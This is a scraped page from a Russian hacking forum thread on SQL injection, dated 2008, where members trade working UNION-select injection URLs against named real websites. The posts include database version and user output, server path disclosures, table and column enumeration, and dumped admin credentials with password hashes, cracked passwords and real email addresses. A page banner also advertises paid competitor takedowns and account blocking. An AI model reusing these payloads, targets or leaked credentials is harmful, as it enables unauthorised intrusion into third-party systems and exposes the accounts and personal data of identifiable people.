Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 588 из 1242

588

Опции темы

Поиск в этой теме

Опции просмотра

#5871

03.07.2008, 01:39

LUKAC

Новичок

Регистрация: 19.08.2007

Сообщений: 18

Провел на форуме:
182410

Репутация: 8

Dimi4 ,посмотри страниц 5-6 назад , я кидал пак , там я уже его ломал =\\

#5872

03.07.2008, 06:09

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

маленькая порция от меня=)

PR 5

Цитата:

http://www.shop.oxfordancestors.com/index.php?cat_id=-6+union+select+concat_ws(0x3a3a,version(),user(),d atabase()),2,3,4,5,6,7,8/*&catname='5%20Gifts'

version(): 4.0.27-standard
user(): conway_oxanshop@localhost
database(): conway_oashop

так же есть раскрытие путей до домашней папки:

Цитата:

/hsphere/local/home/conway/shop.oxfordancestors.com/index.php

Apache/1.3.34

PR 4

Цитата:

http://www.ianshop.com/shop_category.php?cat_id=-4+union+select+concat_ws(0x3a3a,version(),user(),d atabase())--

version(): 5.0.51a-community
user(): ianshop@localhost
database(): ianshop_wordpress
есть раскрытие путей до домашнего каталога:

Цитата:

/home/ianshop/public_html/shop_category.php

Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6

PR 1

Цитата:

http://www.dilemma.ru/shop/shop_display_products.php?cat_id=282222+union+sele ct+concat(version(),0x3a3a,user(),0x3a3a,database( )),2,3,4,5,6,7,8/*

version(): 5.0.45-log
user(): u8509@10.10.223.235
database(): u8509

PR N/A

Цитата:

https://secure6.eliteukserve.net/philip19secure/shop-us/products.php?cat_id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a3a,ve rsion(),user(),database()))),5,6,7,8,9/*

version(): 4.1.16-standard
user(): philip19_db1_rt@europa.eliteukserve.net
database(): philip19_db1

#5873

03.07.2008, 16:49

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

gisTy

Цитата:

http://www.ianshop.com/shop_category.php?cat_id=-4+union+select+concat_ws(0x3a,username,password)+f rom+ianshop_wordpress.shop_admin--

/admin

Цитата:

http://www.ianshop.com/shop_category.php?cat_id=-4+union+select+concat_ws(0x3a,user_login,user_pass )+from+ianshop_wordpress.wp_users--

/blog/wp-login.php

#5874

03.07.2008, 18:33

LUKAC

Новичок

Регистрация: 19.08.2007

Сообщений: 18

Провел на форуме:
182410

Репутация: 8

Цитата:

http://www.lawfirm.ru/article/index.php?id=-326+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0/*

лень крутить было , кто докрутит напишите в личку )

#5875

03.07.2008, 22:28

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

какбы без полей вывода.... (мб я просто ненашел)

www.earthfiles.com

Google PR 6 / 10

Цитата:

http://www.earthfiles.com/news.php?ID=1434+union+select+1,2,3,4--

+ че сегодня за день???

Цитата:

http://www.marvelultimatealliance.com/news.php?id=200'+union+select+1,2,3,4,5,6,7,8/*

__________________

BlackHat.

MoDL

Последний раз редактировалось Dimi4; 03.07.2008 в 23:47..

#5876

03.07.2008, 23:29

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

2 Dimi4
Вывод есть ,только с извратами

ID должно быть положительным , поэтому and, и 2 столбец должен содержать существующее значение .Ветка пятая вывод в title.

_http://www.earthfiles.com/news.php?ID=1434+and+1=2+union+select+1,version(), 3,concat_ws(0x3a,User(),Database(),Version())+from +information_schema.tables--

#5877

04.07.2008, 13:38

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

funnymoneyreport.com (70.87.174.182)

database() roguegov_rgov

version() 4.1.22-standard

user() roguegov_publicr@localhost

TABLE_NAME news

Цитата:

http://www.funnymoneyreport.com/news.php?id=-7465+union+select+database(),version(),user(),4,5, 6/*

__________________

BlackHat.

MoDL

Последний раз редактировалось Dimi4; 04.07.2008 в 13:48..

#5878

04.07.2008, 14:18

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

http://www.ci.bremerton.wa.us/display.php?id=2+union+select+1,2,unhex(hex(versio n())),4,5,6,7,8,9,10,11,12,13,14--

#5879

04.07.2008, 15:45

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

Провел на форуме:
3659973

Репутация: 466

Отправить сообщение для Rubaka с помощью ICQ

http://www.lggroup.us

http://www.lggroup.us/news.php?id=-2+union+select+1,2,concat(user,0x3a,pass),4,5+from +users--

lgg:dancing5678

#5880

04.07.2008, 15:57

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

bata.com (213.30.168.66)

Database Version: 5.0.15-nt
Database name: bata-com
User name: prod-bata-com@localhost

Вот это я понимаю удобно, вывод без ограничений

Цитата:

http://www.bata.com/news/news/news.php?id=448/**/union/**/select/**/1,2,3,TABLE_NAME,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,50/*

Интересные таблицы:

Цитата:

a_users_f

a_groups_f

Вывод всех полей:

Цитата:

http://www.bata.com/news/news/news.php?id=448/**/union/**/select/**/1,2,3,COLUMN_NAME,5,6,7,8,9/**/from/**/information_schema.columns/**/where/**/TABLE_NAME='a_users_f'/**/limit/**/1,20/*

Цитата:

us_id
us_gr_id
us_login
us_password
us_email
us_fname
us_lname
us_company
us_ri_id
us_createddate
us_modifieddate
us_lastlogon
us_modified
us_deleted
us_ts

Собстна юзеры:

Цитата:

http://www.bata.com/news/news/news.php?id=448/**/union/**/select/**/1,2,3,concat_ws(0x203a203a20,us_id,us_login,us_pas sword,us_email),5,6,7,8,9/**/from/**/a_users_f/**/limit/**/1,20/*

Цитата:

1 : : ldehon : : 250cf8b51c773f3f8dc8b4be867a9a02 : : ldehon@i-puzzle.fr
2 : : test : : 098f6bcd4621d373cade4e832627b4f6 : : test@aol.com
3 : : lboulet : : b555f4a2901228cc826327079761e696 : : laurence.boulet@bata.com
4 : : rsp : : 250cf8b51c773f3f8dc8b4be867a9a02 : :
5 : : csp : : 250cf8b51c773f3f8dc8b4be867a9a02 : :

найденные пароли (первая пятерка):

1 : : ldehon : : 456 : : ldehon@i-puzzle.fr

2 : : test : : test : : test@aol.com

3 : : lboulet : : 6880 : : laurence.boulet@bata.com

4 : : rsp : : 456 : :

5 : : csp : : 456 : :

Мистика каято.. у большинства пароль 456

__________________

BlackHat.

MoDL

Страница 588 из 1242

588

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход